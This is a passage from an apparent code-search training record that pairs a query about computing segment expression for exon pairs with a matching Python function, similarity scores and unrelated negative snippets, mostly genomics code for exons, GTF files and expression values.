blockSize\n exons.append([exonStart, exonEnd])\n return(exons)", "def collect_two(indiv):\t\r\n\tcnt=0\r\n\tpositions=[]\r\n\tfor i in xrange(0,len(indiv)):\r\n\t\tif indiv[i]==\"2\":\r\n\t\t\tcnt+=1\r\n\t\t\tpositions.append(i)\r\n\treturn cnt, positions", "def count(self) -> int:\n return self.end_measure_num - self.start_measure_num + 1" ]
[ "0.65174055", "0.6436669", "0.6075838", "0.5796184", "0.57153535", "0.57003266", "0.56921184", "0.5661428", "0.5604101", "0.5561135", "0.55508536", "0.553926", "0.5515936", "0.5487367", "0.54719216", "0.54696095", "0.5457705", "0.54412377", "0.537007", "0.5364843", "0.5354218", "0.5335863", "0.53334385", "0.53301716", "0.5315513", "0.5278118", "0.52419317", "0.5225898", "0.52038926", "0.5200646", "0.5196693", "0.51609176", "0.5150832", "0.5137895", "0.5134223", "0.5126972", "0.51248884", "0.51117927", "0.51111287", "0.508531", "0.50580734", "0.5053459", "0.5052621", "0.5045549", "0.5034423", "0.50231344", "0.50072426", "0.50026345", "0.49815243", "0.49771845", "0.49627352", "0.49544355", "0.49310598", "0.48699963", "0.4863025", "0.48584485", "0.48483926", "0.48377845", "0.48265868", "0.4822924", "0.48225364", "0.48147675", "0.48137587", "0.48098528", "0.48049816", "0.4799045", "0.47983438", "0.4794377", "0.47937578", "0.4788201", "0.4784568", "0.47775093", "0.4773467", "0.4763612", "0.47623506", "0.47544044", "0.47531247", "0.47502178", "0.47458857", "0.47453412", "0.4741631", "0.47369128", "0.47274983", "0.4724792", "0.47214755", "0.4712859", "0.47089255", "0.47088844", "0.47067606", "0.4701745", "0.4682772", "0.4678158", "0.4677673", "0.46748427", "0.4667022", "0.46656954", "0.4664624", "0.46581206", "0.46556315", "0.46524578", "0.46521762" ]
0.0
-1
Get the segment expression for one exonpair. Apply 'get_exon_expr' for each exon and concatenate them.
def get_segment_expr(gene, coord, countinfo, Idx, seg_counts, cross_graph_expr): if coord.start_v3 is None: expr_list = np.vstack([get_exon_expr(gene, coord.start_v1, coord.stop_v1, countinfo, Idx, seg_counts ), get_exon_expr(gene, coord.start_v2, coord.stop_v2, countinfo, Idx, seg_counts )]) else: expr_list = np.vstack([get_exon_expr(gene, coord.start_v1, coord.stop_v1, countinfo, Idx, seg_counts ), get_exon_expr(gene, coord.start_v2, coord.stop_v2, countinfo, Idx, seg_counts ), get_exon_expr(gene, coord.start_v3, coord.stop_v3, countinfo, Idx, seg_counts )]) seg_len = np.sum(expr_list[:, 0]) n_samples = expr_list[:, 1:].shape[1] len_factor = np.tile(expr_list[:, 0], n_samples).reshape(n_samples, expr_list.shape[0]).transpose() mean_expr = (np.sum(expr_list[:, 1:]*len_factor, 0) / seg_len).astype(int) if seg_len > 0 else np.zeros(n_samples).astype(int) if not cross_graph_expr: mean_expr = mean_expr[0] return mean_expr,expr_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_exon_expr(gene, vstart, vstop, countinfo, Idx, seg_counts):\n out_shape = (seg_counts.shape[1] + 1) if len(seg_counts.shape) > 1 else 2\n # Todo: deal with absense of count file\n if vstart is np.nan or vstop is np.nan: # isolated exon case\n return np.zeros((0, out_shape), dtype='float')\n if countinfo is None or Idx.sample is None:\n return np.zeros((0, out_shape), dtype='float') #[np.nan]\n\n segments = gene.segmentgraph.segments\n\n sv1_id = bisect.bisect(segments[0], vstart) - 1\n sv2_id = bisect.bisect(segments[0], vstop) - 1\n if sv1_id == sv2_id:\n if len(seg_counts.shape) > 1:\n expr_list = np.c_[np.array([vstop - vstart]), [seg_counts[sv1_id, :]]]\n else:\n expr_list = np.array([(vstop - vstart, seg_counts[sv1_id])])\n else:\n if len(seg_counts.shape) > 1:\n expr_list = np.c_[segments[1, sv1_id:sv2_id + 1] - segments[0, sv1_id:sv2_id + 1], seg_counts[sv1_id:sv2_id + 1, :]]\n else:\n expr_list = np.c_[segments[1, sv1_id:sv2_id + 1] - segments[0, sv1_id:sv2_id + 1], seg_counts[sv1_id:sv2_id + 1, np.newaxis]]\n expr_list[0, 0] -= (vstart - segments[0, sv1_id])\n expr_list[-1, 0] -= (segments[1, sv2_id] - vstop)\n if gene.strand == '-': # need to reverse epression list to match the order of translation\n expr_list = expr_list[::-1]\n return expr_list", "def __get_exon_coordinates(self, exon):\n start = None\n end = None\n if self.__is_padding_enabled():\n start = exon[constants.EXON_PADDED_START]\n end = exon[constants.EXON_PADDED_END]\n else:\n start = exon[constants.EXON_START]\n end = exon[constants.EXON_END]\n return (start, end)", "def getExons(self):\n rtrn = []\n for i in range(0,len(self.exonStarts)):\n rtrn.append(Interval(self.chr,self.exonStarts[i],self.exonEnds[i],self.strand,name = self.name+\"_exon_\"+str(i+1)))\n return rtrn", "def as_exons(self,input={}):\n # handle potentially applied input argument\n self._handle_input_subdict(input)\n # parse data in the AbgpGeneLocusDir\n self.parseinputgff()\n self.rungetorf()\n # we need abgp_geneconfirmation.geneconfirmation first!\n geneconfirmation( { self._create_auto_key(): self.input } )\n\n # get only the CDS-type of tracks that define the coding sequence\n genecdstracks = filtergffs4fmethod( self._obtain_gene_gff(), GFF_CDS_FMETHOD ) \n\n if len(genecdstracks) == 1:\n # deal with SingleExonOnOrf -> TSS + donor\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][0])\n tss = self._gene_cds_track_2_tss( genecdstracks[0], orf )\n return [ SingleExonOnOrf(tss,genecdstracks[-1][4],orf,gff={}) ]\n\n elif len(genecdstracks) == 0:\n # no tracks !?\n return []\n elif not self.input['orfid-genestructure']:\n # not mappable on Orfs / or no genestructure provided\n return []\n else:\n # list with exons,introns to return \n exons = []\n introns = []\n exonsandintrons = []\n\n # deal with FirstExonOnOrf -> TSS + donor\n try:\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][0])\n except:\n print self.input.keys(), self.input['proteinfref']\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][0])\n\n tss = self._gene_cds_track_2_tss( genecdstracks[0], orf )\n donor = self._gene_cds_track_2_donor( genecdstracks[0], orf )\n donor.phase = ( genecdstracks[0][4]-genecdstracks[0][3]-1 ) % 3\n exons.append( FirstExonOnOrf(tss,donor,orf,gff={}) )\n exonsandintrons.append( exons[-1] )\n\n # deal with internal ExonOnOrf(s): -> acceptor + donor\n for pos in range(1,len(genecdstracks)-1):\n orf = 
self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][pos])\n accep = self._gene_cds_track_2_acceptor( genecdstracks[pos], orf )\n accep.phase = exons[-1].donor.phase\n donor = self._gene_cds_track_2_donor( genecdstracks[pos], orf )\n donor.phase = ( genecdstracks[pos][4]-genecdstracks[pos][3]-1+accep.phase ) % 3\n exons.append( ExonOnOrf(accep,donor,orf,gff={}) )\n sharednts = get_shared_nucleotides_at_splicesite(\n exons[-1].orf, exons[-2].orf,\n exons[-1].acceptor, exons[-2].donor,\n )\n intron = IntronConnectingOrfs(\n exons[-2].donor, exons[-1].acceptor, sharednts,\n exons[-2].orf, exons[-1].orf,\n )\n introns.append(intron)\n exonsandintrons.append( introns[-1] )\n exonsandintrons.append( exons[-1] )\n\n # deal with FinalExonOnOrf -> acceptor + StopCodon\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][-1])\n accep = self._gene_cds_track_2_acceptor( genecdstracks[-1], orf )\n accep.phase = exons[-1].donor.phase\n exons.append( FinalExonOnOrf(accep,genecdstracks[-1][4],orf,gff={}) )\n sharednts = get_shared_nucleotides_at_splicesite(\n exons[-1].orf,exons[-2].orf,\n exons[-1].acceptor,exons[-2].donor,\n )\n intron = IntronConnectingOrfs(\n exons[-2].donor, exons[-1].acceptor, sharednts,\n exons[-2].orf, exons[-1].orf,\n )\n introns.append(intron)\n exonsandintrons.append( introns[-1] )\n exonsandintrons.append( exons[-1] )\n\n # return list of exons&introns\n return exonsandintrons", "def convert_exon_data(opts, exon_recs):\n er0 = exon_recs[0]\n ti = TxInfo(ac=er0[\"tx_ac\"],\n origin=opts.origin,\n hgnc=None,\n cds_se_i=None,\n exons_se_i=\";\".join(\n [\"{},{}\".format(int(ex[\"tx_start\"]) - 1, ex[\"tx_end\"]) for ex in exon_recs])\n )\n es = ExonSet(\n tx_ac=er0[\"tx_ac\"],\n alt_ac=er0[\"ref_ac\"],\n method=\"splign\",\n strand=-1 if er0[\"strand\"] == \"-\" else 1,\n exons_se_i=\";\".join(\n [\"{},{}\".format(int(ex[\"g_start\"]) - 1, ex[\"g_end\"]) for ex in exon_recs])\n )\n return (ti, es)", "def exon_context(exon, start, stop):\n assert start and stop\n exon = exon.split('\\t')\n start = start.split('\\t')\n stop = stop.split('\\t')\n assert len(exon) == 9 and len(start) == 9 and len(stop) == 9\n\n hasstart = feat_overlap(exon, start)\n hasstop = feat_overlap(exon, stop)\n if hasstart or hasstop:\n if hasstart and hasstop:\n return 'complete'\n elif hasstart:\n return 'start'\n else:\n assert hasstop\n return 'stop'\n\n exonstart = int(exon[3])\n exonend = int(exon[4])\n codonnucs = [start[3], start[4], stop[3], stop[4]]\n codonnucs = [int(x) for x in codonnucs]\n leftmostnuc = min(codonnucs)\n rightmostnuc = max(codonnucs)\n if exonend < leftmostnuc:\n if exon[6] == '-':\n return '3putr'\n else:\n return '5putr'\n elif exonstart > rightmostnuc:\n if exon[6] == '-':\n return '5putr'\n else:\n return '3putr'\n else:\n assert exonstart > leftmostnuc and exonend < rightmostnuc\n return 'cds'", "def part_expression(ex_name, stat_type):\n if stat_type =='':\n start = '['\n end = ']'\n else:\n start = '(['\n end = '])'\n expression = stat_type + start + ex_name + end\n return expression", "def _get_einstr(self, nodeindex, parent_nodeindex, contract_index):\n nd = self.order\n str1 = \"\".join([chr(ord('a') + j) for j in range(nd)])\n str2 = \"R\" + (chr(ord('a') + contract_index))\n str3 = \"\".join(\n [chr(ord('a') + j)\n for j in range(contract_index)]) + \"R\" + \"\".join(\n [chr(ord('a') + j) for j in range(contract_index + 1, nd)])\n einstr = str1 + \",\" + str2 + \"->\" + str3\n return einstr", "def expression_maker(ex_names, 
stat_type):\n if len(ex_names) == 1:\n expression = part_expression(ex_names[0], stat_type)\n else:\n current_part = ex_names.pop(-1)\n expression = (expression_maker(ex_names, stat_type) + ','\n + part_expresion(current_part, stat_type))\n\n return expression", "def _getvalue_expr_Str(self, expr: ast.Str) -> Any:\n return expr.s", "def _findEvidExonRange(self, transAnnot, evidTrans):\n # Walk from start to find start and end to find end, as multiple might overlap,\n # however don't go past bounds of the annotation, in case evidence and annotation\n # are interleaved. This would be simper without the extend mode.\n return (self._findEvidExonRangeStart(transAnnot, evidTrans),\n self._findEvidExonRangeEnd(transAnnot, evidTrans))", "def _Expr(self, tree):\n # Catch odd case of multi line strings and doc strings which are Expr with a Constant string type value\n if isinstance(tree.value, ast.Constant):\n if isinstance(tree.value.value, str):\n return\n # catch special case of Python 3.7 Where doc string is a Str and not a Constant\n elif isinstance(tree.value, ast.Str):\n return \n # otherwise treat like a normal expression\n self.fill()\n self.dispatch(tree.value)\n self.write(\";\")", "def evaluate(self, edict):\n result = self._evaluateBySegments(edict)\n # allow each segment ROM to modify signal based on global training settings\n for s, segment in enumerate(self._getSequentialRoms()):\n delim = self._divisionInfo['delimiters'][s]\n picker = slice(delim[0], delim[-1] + 1)\n result = segment.finalizeLocalRomSegmentEvaluation(self._romGlobalAdjustments, result, picker)\n result = self._templateROM.finalizeGlobalRomSegmentEvaluation(self._romGlobalAdjustments, result)\n return result", "def createExon(strand_p, five_p_utr, cds_cod, three_p_utr):\n exon_pos = []\n if strand_p == '+': \n utr5_start, utr5_end = 0, 0\n if five_p_utr != []:\n utr5_start, utr5_end = five_p_utr[-1][0], five_p_utr[-1][1] \n cds_5start, cds_5end = cds_cod[0][0], cds_cod[0][1]\n jun_exon = []\n if cds_5start-utr5_end == 0 or cds_5start-utr5_end == 1:\n jun_exon = [utr5_start, cds_5end] \n if len(cds_cod) == 1:\n five_prime_flag = 0\n if jun_exon != []:\n five_p_utr = five_p_utr[:-1]\n five_prime_flag = 1\n for utr5 in five_p_utr:\n exon_pos.append(utr5)\n jun_exon = []\n utr3_start, utr3_end = 0, 0\n if three_p_utr != []: \n utr3_start = three_p_utr[0][0]\n utr3_end = three_p_utr[0][1]\n if utr3_start-cds_5end == 0 or utr3_start-cds_5end == 1:\n jun_exon = [cds_5start, utr3_end]\n three_prime_flag = 0\n if jun_exon != []: \n cds_cod = cds_cod[:-1]\n three_p_utr = three_p_utr[1:]\n three_prime_flag = 1\n if five_prime_flag == 1 and three_prime_flag == 1:\n exon_pos.append([utr5_start, utr3_end])\n if five_prime_flag == 1 and three_prime_flag == 0:\n exon_pos.append([utr5_start, cds_5end])\n cds_cod = cds_cod[:-1]\n if five_prime_flag == 0 and three_prime_flag == 1:\n exon_pos.append([cds_5start, utr3_end])\n for cds in cds_cod:\n exon_pos.append(cds)\n for utr3 in three_p_utr:\n exon_pos.append(utr3)\n else: \n if jun_exon != []:\n five_p_utr = five_p_utr[:-1]\n cds_cod = cds_cod[1:]\n for utr5 in five_p_utr:\n exon_pos.append(utr5)\n exon_pos.append(jun_exon) if jun_exon != [] else ''\n jun_exon = []\n utr3_start, utr3_end = 0, 0\n if three_p_utr != []:\n utr3_start = three_p_utr[0][0]\n utr3_end = three_p_utr[0][1]\n cds_3start = cds_cod[-1][0]\n cds_3end = cds_cod[-1][1]\n if utr3_start-cds_3end == 0 or utr3_start-cds_3end == 1: \n jun_exon = [cds_3start, utr3_end]\n if jun_exon != []:\n cds_cod = cds_cod[:-1]\n 
three_p_utr = three_p_utr[1:]\n for cds in cds_cod:\n exon_pos.append(cds)\n exon_pos.append(jun_exon) if jun_exon != [] else ''\n for utr3 in three_p_utr:\n exon_pos.append(utr3)\n elif strand_p == '-':\n utr3_start, utr3_end = 0, 0 \n if three_p_utr != []:\n utr3_start = three_p_utr[-1][0]\n utr3_end = three_p_utr[-1][1]\n cds_3start = cds_cod[0][0]\n cds_3end = cds_cod[0][1]\n jun_exon = []\n if cds_3start-utr3_end == 0 or cds_3start-utr3_end == 1:\n jun_exon = [utr3_start, cds_3end] \n if len(cds_cod) == 1: \n three_prime_flag = 0\n if jun_exon != []:\n three_p_utr = three_p_utr[:-1]\n three_prime_flag = 1\n for utr3 in three_p_utr:\n exon_pos.append(utr3)\n jun_exon = []\n (utr5_start, utr5_end) = (0, 0)\n if five_p_utr != []:\n utr5_start = five_p_utr[0][0]\n utr5_end = five_p_utr[0][1]\n if utr5_start-cds_3end == 0 or utr5_start-cds_3end == 1:\n jun_exon = [cds_3start, utr5_end]\n five_prime_flag = 0\n if jun_exon != []:\n cds_cod = cds_cod[:-1]\n five_p_utr = five_p_utr[1:]\n five_prime_flag = 1\n if three_prime_flag == 1 and five_prime_flag == 1:\n exon_pos.append([utr3_start, utr5_end])\n if three_prime_flag == 1 and five_prime_flag == 0:\n exon_pos.append([utr3_start, cds_3end])\n cds_cod = cds_cod[:-1]\n if three_prime_flag == 0 and five_prime_flag == 1:\n exon_pos.append([cds_3start, utr5_end]) \n for cds in cds_cod:\n exon_pos.append(cds)\n for utr5 in five_p_utr:\n exon_pos.append(utr5)\n else:\n if jun_exon != []:\n three_p_utr = three_p_utr[:-1]\n cds_cod = cds_cod[1:]\n for utr3 in three_p_utr:\n exon_pos.append(utr3) \n if jun_exon != []:\n exon_pos.append(jun_exon)\n jun_exon = []\n (utr5_start, utr5_end) = (0, 0)\n if five_p_utr != []:\n utr5_start = five_p_utr[0][0]\n utr5_end = five_p_utr[0][1] \n cds_5start = cds_cod[-1][0]\n cds_5end = cds_cod[-1][1]\n if utr5_start-cds_5end == 0 or utr5_start-cds_5end == 1:\n jun_exon = [cds_5start, utr5_end]\n if jun_exon != []:\n cds_cod = cds_cod[:-1]\n five_p_utr = five_p_utr[1:]\n for cds in cds_cod:\n exon_pos.append(cds)\n if jun_exon != []:\n exon_pos.append(jun_exon) \n for utr5 in five_p_utr:\n exon_pos.append(utr5)\n return exon_pos", "def getholder_exp_pairs_sent(sent, expr, holders, exptype=False, isolate_exp=True, test=False):\n tuples = []\n if not exptype:\n exptypelist = EXPTYPES\n else:\n exptypelist = [exptype]\n for exptype in exptypelist:\n #print exptype\n for gate in expr[exptype].values():\n tmp = False\n try:\n tmp = gate['GATE']['nested_source_split'][-1]\n except:\n # Some expressions lack nested-source\n if DEBUG:\n print 'missing nested-source for', gate['GATE']\n tmp = False\n counters['exp-pair no nested source'] += 1\n if tmp: \n if tmp in holders:\n if isinstance(holders[tmp], OrderedDict):\n coref = []\n for h in holders[tmp].values():\n coref.append(h['token_id'])\n for h in holders[tmp].values():\n tuples.append((gate['token_id'], h['token_id'], exptype, coref))\n else:\n tuples.append((gate['token_id'], holders[tmp]['token_id'], exptype, False))\n elif tmp == 'writer' or tmp == 'w':\n #print \"w\"\n tuples.append((gate['token_id'], 'w', exptype, False))\n else: #Implicit\n #print \"i\"\n tuples.append((gate['token_id'], 'implicit', exptype, False))\n return tuples", "def getexpressions_sent(sent, predict=False):\n expr = {}\n if predict:\n gatekey = 'PGATE'\n else:\n gatekey = 'GATE'\n for exptype in EXPTYPES:\n expr[exptype] = OrderedDict()\n for i, t in enumerate(sent):\n for gate in t[gatekey]:\n if gate['slice'].start != gate['slice'].stop:\n tmp = gate['ann_type']\n if re_ose.match(tmp):\n 
if gate['line_id'] not in expr['ose']:\n expr['ose'][gate['line_id']] = {gatekey: gate,\n 'token_id': set([i+1])}\n else:\n expr['ose'][gate['line_id']]['token_id'].add(i+1)\n elif re_ese.match(tmp): #tmp == 'GATE_expressive-subjectivity':\n if gate['line_id'] not in expr['ese']:\n expr['ese'][gate['line_id']] = {gatekey: gate,\n 'token_id': set([i+1])}\n else:\n expr['ese'][gate['line_id']]['token_id'].add(i+1)\n elif re_dse.match(tmp): #tmp == 'GATE_direct-subjective':\n if gate['line_id'] not in expr['dse']:\n expr['dse'][gate['line_id']] = {gatekey: gate,\n 'token_id': set([i+1])}\n else:\n expr['dse'][gate['line_id']]['token_id'].add(i+1)\n return expr", "def render_expression(ex):\r\n try:\r\n return _render_to_html(_get_final_tree(ex))\r\n except ParseException:\r\n return err(ex)", "def calculate(self, expression):\n array = []\n for value in expression:\n array.append(value)\n return self.__helper_function(array)", "def get_eco_details(self, pgn_data):\n result = eco_mapping['unknown']\n\n try:\n moves = self.get_moves(pgn_data)\n current_sequence = ''\n\n for move in moves:\n half_move = '.'.join([move[0], move[1]])\n current_sequence += half_move\n\n if current_sequence in eco_mapping:\n result = eco_mapping[current_sequence]\n else:\n break\n\n current_sequence = ' '.join([current_sequence, move[2]])\n\n if current_sequence in eco_mapping:\n result = eco_mapping[current_sequence]\n else:\n break\n\n current_sequence += ' '\n except:\n pass\n\n return result", "def _get_energies_atom(self, file1, file2, natom):\n esp = loadtxt(file1)\n etot = loadtxt(file2)\n esp_at = esp[-natom:,1]\n etot_at = etot[-natom:,1]\n return esp_at, etot_at", "def _GetExpressions(self,key=\"\"):\r\n global commonexpressions\r\n global uniqexpressions\r\n result=[]\r\n if not self.classname: return result\r\n if not self.classname.startswith(\"npc_V\"): return result\r\n result.extend(commonexpressions)\r\n if \"\"==key: key=self.GetID()\r\n if key in uniqexpressions.keys():\r\n result.extend(uniqexpressions[key])\r\n return result", "def resolve_expression(self):\n stack = list()\n\n for element in self._get_postfix_notation():\n if element in self.OPERATORS: # get two elements from top of stack, push result of operation on stack\n operand_a = stack.pop()\n operand_b = stack.pop()\n value = self._calculate(operand_b, operand_a, element)\n stack.append(value)\n else: # push to stack if number\n stack.append(element)\n\n return stack.pop()", "def expression_phrase(self):\n return self._expression_phrase", "def get_formula_in_list(self):\n return tree_to_string(self.expression)", "def expression(self):\n assert not self._handle_used\n self._expression_used = True\n return self._expression", "def exon_desc(gff3, fasta):\n seqs = {}\n for defline, seq in LocusPocus.fasta.parse(fasta):\n exonpos = defline[1:].split(' ')[1]\n seqs[exonpos] = seq\n\n rnaid_to_accession = dict()\n reported_exons = {}\n exons, cdss = [], {}\n start, stop = None, None\n moltypes = ['mRNA', 'tRNA', 'ncRNA', 'transcript', 'primary_transcript',\n 'V_gene_segment', 'D_gene_segment', 'J_gene_segment',\n 'C_gene_segment']\n for entry in gff3:\n for moltype in moltypes:\n if ('\\t%s\\t' % moltype) in entry:\n accession = re.search(r'accession=([^;\\n]+)', entry).group(1)\n tid = re.search(r'ID=([^;\\n]+)', entry).group(1)\n rnaid_to_accession[tid] = accession\n\n if '\\texon\\t' in entry:\n exons.append(entry)\n elif '\\tCDS\\t' in entry:\n fields = entry.split('\\t')\n pos = '%s_%s-%s%s' % (fields[0], fields[3], fields[4], 
fields[6])\n cdss[pos] = entry\n elif '\\tstart_codon\\t' in entry:\n start = entry\n elif '\\tstop_codon\\t' in entry:\n stop = entry\n elif entry.startswith('###'):\n if len(exons) == 0:\n continue\n xcept = False\n for exonpos in cdss:\n if ';exception=ribosomal slippage' in cdss[exonpos]:\n xcept = True\n if xcept:\n exons, cdss = [], {}\n start, stop = None, None\n continue\n assert start, 'No start codon for exon(s): %s' % exons[0]\n assert stop, 'No stop codon for exon(s): %s' % exons[0]\n for exon in exons:\n fields = exon.split('\\t')\n assert len(\n fields) == 9, 'entry does not have 9 fields: %s' % exon\n mrnaid = re.search(r'Parent=([^;\\n]+)', fields[8]).group(1)\n exonpos = '%s_%s-%s%s' % (fields[0],\n fields[3], fields[4], fields[6])\n if exonpos in reported_exons:\n continue\n exonlength = int(fields[4]) - int(fields[3]) + 1\n exonseq = seqs[exonpos]\n assert len(exonseq) == exonlength, \\\n 'exon \"%s\": length mismatch; gff=%d, fa=%d' % (\n exonpos, exonlength, len(exonseq))\n gccontent = gc_content(exonseq)\n gcskew = gc_skew(exonseq)\n ncontent = n_content(exonseq)\n context = exon_context(exon, start, stop)\n phase = None\n remainder = None\n if context == 'cds':\n cexon = cdss[exonpos]\n phase = int(cexon.split('\\t')[7])\n remainder = (exonlength - phase) % 3\n values = '%s %s %d %.3f %.3f %.3f %s %r %r' % (\n exonpos, rnaid_to_accession[mrnaid], exonlength, gccontent,\n gcskew, ncontent, context, phase, remainder)\n reported_exons[exonpos] = 1\n yield values.split(' ')\n exons, cdss = [], {}\n start, stop = None, None", "def _get_seg_repr(self, set_speakers=True):\n result = str(self.get_seg_header())\n for seg in self._segments:\n line = seg.get_line()\n if set_speakers:\n line[-1] = self._speaker\n else:\n line[-1] = self._label\n result += \"%s %s %s %s %s %s %s %s\\n\" % tuple(line)\n return result", "def _update_from_exons(self, feature):\n # note that start and end here are in direction of translation\n def start(loc):\n return loc[0][1]\n\n def end(loc):\n if loc[-1][2] == \"+\":\n return loc[-1][1] + loc[-1][3] + 1\n else:\n return loc[-1][1] - loc[-1][3] - 1\n\n if 'exon' in feature:\n # update the feature with the exon locations and sequences\n feature['location'] = [x['location'][0] for x in feature['exon']]\n feature['dna_sequence'] = \"\".join(\n x['dna_sequence'] for x in feature['exon'])\n feature['dna_sequence_length'] = len(feature['dna_sequence'])\n\n # construct feature location from utrs and cdss if present\n elif 'cds' in feature:\n cds = [copy.deepcopy(self.feature_dict[feature['cds']])]\n locs = [] # type: list\n seq = \"\"\n for frag in feature.get('five_prime_UTR', []) + cds + \\\n feature.get('three_prime_UTR', []):\n\n # merge into last location if adjacent\n if locs and abs(end(locs) - start(frag['location'])) == 1:\n # extend the location length by the length of the first\n # location in the fragment\n first = frag['location'].pop(0)\n locs[-1][3] += first[3]\n\n locs.extend(frag['location'])\n seq += frag['dna_sequence']\n\n feature['location'] = locs\n feature['dna_sequence'] = seq\n feature['dna_sequence_length'] = len(seq)\n\n # remove these properties as they are no longer needed\n for x in ['five_prime_UTR', 'three_prime_UTR', 'exon']:\n feature.pop(x, None)\n\n else:\n ValueError('Feature {feature[\"id\"]} must contain either exon or cds data to '\n 'construct an accurate location and sequence')", "def get_seq(self):\n dna_seq = ''\n\n for exon in self.exons: \n dna_seq += self.rna.gene.polymer.get_subseq(\n start=exon.start, 
end=exon.end)\n\n if self.rna.gene.strand==core.PolymerStrand.negative:\n dna_seq = dna_seq.reverse_complement() \n \n return dna_seq.transcribe()", "def expr(self):\n return self._express", "def concatenate(expression, stream):\n # fork the stream for each subexpression\n streams = itertools.tee(stream, len(expression.children))\n return itertools.chain.from_iterable(\n evaluate(expression, stream)\n for expression, stream in zip(expression.children, streams)\n )", "def get_char_expr(self, param, type='rel', inconn=0, outconn=0):\n if type == 'rel':\n if param == 'm':\n return (\n self.inl[inconn].m.val_SI / self.inl[inconn].m.design)\n elif param == 'm_out':\n return (\n self.outl[outconn].m.val_SI /\n self.outl[outconn].m.design)\n elif param == 'v':\n v = self.inl[inconn].m.val_SI * v_mix_ph(\n self.inl[inconn].get_flow(),\n T0=self.inl[inconn].T.val_SI)\n return v / self.inl[inconn].v.design\n elif param == 'pr':\n return (\n (self.outl[outconn].p.val_SI *\n self.inl[inconn].p.design) /\n (self.inl[inconn].p.val_SI *\n self.outl[outconn].p.design))\n else:\n msg = (\n 'The parameter ' + str(param) + ' is not available '\n 'for characteristic function evaluation.')\n logger.error(msg)\n raise ValueError(msg)\n else:\n if param == 'm':\n return self.inl[inconn].m.val_SI\n elif param == 'm_out':\n return self.outl[outconn].m.val_SI\n elif param == 'v':\n return self.inl[inconn].m.val_SI * v_mix_ph(\n self.inl[inconn].get_flow(),\n T0=self.inl[inconn].T.val_SI)\n elif param == 'pr':\n return (\n self.outl[outconn].p.val_SI /\n self.inl[inconn].p.val_SI)\n else:\n return False", "def stringbuilderexpr(self) :\n\t\ttry :\n\t\t\treturn self._stringbuilderexpr\n\t\texcept Exception as e:\n\t\t\traise e", "def write_exons(input_file, gtf_chrom_dict):\n\n dotexon = open(input_file + '.exon', 'w')\n if input_file[0:3] == 'ref':\n interval_best_matches = MatchingDicts.ref_best_matches\n dotexon.write(\"ExonID\\tChromosome\\tReference(Coordinates[strand]|Transcript[exon_number])\\tMatch_Type\\t\" +\n \"Query(Best_Match_Coordinates|Transcript[exon_number])\\tShared\\tBase_Difference\\tNotes\\n\")\n else:\n interval_best_matches = MatchingDicts.interval_best_matches\n dotexon.write(\"ExonID\\tChromosome\\tQuery(Coordinates[strand]|Transcript[exon_number])\\tMatch_Type\\t\" +\n \"Reference(Best_Match_Coordinates|Transcript[exon_number])\\tShared\\tBase_Difference\\tNotes\\n\")\n gtf_exons = {}\n for chrom in gtf_chrom_dict:\n for strand in gtf_chrom_dict[chrom]:\n len_after = len(gtf_exons) + len(gtf_chrom_dict[chrom][strand][1])\n gtf_exonc = gtf_exons.copy()\n gtf_exons.update(gtf_chrom_dict[chrom][strand][1])\n if len(gtf_exons) < len_after:\n print(\"Dictionary was OVERRITTEN\");\n ids = [(keyid, valid.id, valid.chrom, valid.strand, valid.begin, valid.end, \"next\", gtf_exonc[keyid].id, gtf_exonc[keyid].chrom, gtf_exonc[keyid].strand, gtf_exonc[keyid].begin, gtf_exonc[keyid].end) for keyid, valid in gtf_chrom_dict[chrom][strand][1].items() if keyid in gtf_exonc]\n print(ids)\n exit()\n for exon_id in sorted(gtf_exons):\n exon = gtf_exons[exon_id]\n cinter = Interval(exon.begin, exon.end, exon.gtf_interval)\n bests = interval_best_matches.get(cinter, None)\n # If a match (best match) was found write each match in .exon file\n if bests:\n for bintr, bval in bests.items():\n dotexon.write('{}\\t{}\\t{}-{}[{}]|{}[{}]\\t{}\\t{}-{}[{}]|{}\\t{}\\t({},{})\\t({})\\n'.format(\n exon_id, exon.chrom, cinter.begin, cinter.end - 1, cinter.data.strand, exon.transcript_id,\n 
cinter.data.transcriptIds[exon.transcript_id], bval[1], bintr.begin, bintr.end - 1,\n bintr.data.strand, '|'.join(['{}[{}]'.format(k, v) for k, v in bintr.data.transcriptIds.items()]),\n bval[0], bintr.begin - cinter.begin, cinter.end - bintr.end, NOTES[cinter.data.note]\n ))\n else:\n dotexon.write('{}\\t{}\\t{}-{}[{}]|{}[{}]\\tNovel\\t-\\t-\\t-\\t-\\n'.format(\n exon_id, exon.chrom, cinter.begin, cinter.end - 1, cinter.data.strand, exon.transcript_id,\n cinter.data.transcriptIds[exon.transcript_id]\n ))\n dotexon.close()", "def expression(self) -> str:\n return pulumi.get(self, \"expression\")", "def expression(self) -> str:\n return pulumi.get(self, \"expression\")", "def _calculate_for_one_side(self, equation, side=\"left_side\"):\n max_width = 0\n for entity in equation.get(\"children\"): # iterate through the entities separated by `+`\n single_entity = entity.get(\"children\")[0]\n num_of_children = len(single_entity.get(\"children\")) # children separated by ::\n width, height = self._calculate_nested_complexes(single_entity, num_of_children - 2) # penultimate entity\n single_entity[\"size\"] = {\"width\": width, \"height\": height}\n if width > max_width:\n max_width = width\n self._current_x, self._current_y = 0, 0\n\n # add complex into compartments\n compartment_entity = single_entity.get(\"children\")[num_of_children - 1]\n compartment_name = compartment_entity.get(\"children\")[0][\"entity\"][\"token\"]\n if self.compartments.get(compartment_name) is None:\n self.compartments[compartment_name] = {\"left_side\": [], \"right_side\": []}\n self.compartments[compartment_name][side].append(single_entity)\n else:\n self.compartments[compartment_name][side].append(single_entity)\n\n if side == \"left\":\n self.x_limit = max_width + 2*X_ENTITY_DISTANCE\n else:\n self.x_limit += max_width + 2*X_ENTITY_DISTANCE", "def evaluate(self, edict):\n if self._evaluationMode == 'full':\n # TODO there's no input-based way to request this mode right now.\n ## It has been manually tested, but needs a regression tests once this is opened up.\n ## Right now consider it as if it wasn't an available feature, cuz it kinda isn't.\n result = Segments.evaluate(self, edict)\n elif self._evaluationMode == 'truncated':\n result, weights = self._createTruncatedEvaluation(edict)\n for r, rom in enumerate(self._roms):\n # \"r\" is the cluster label\n # find ROM in cluster\n clusterIndex = 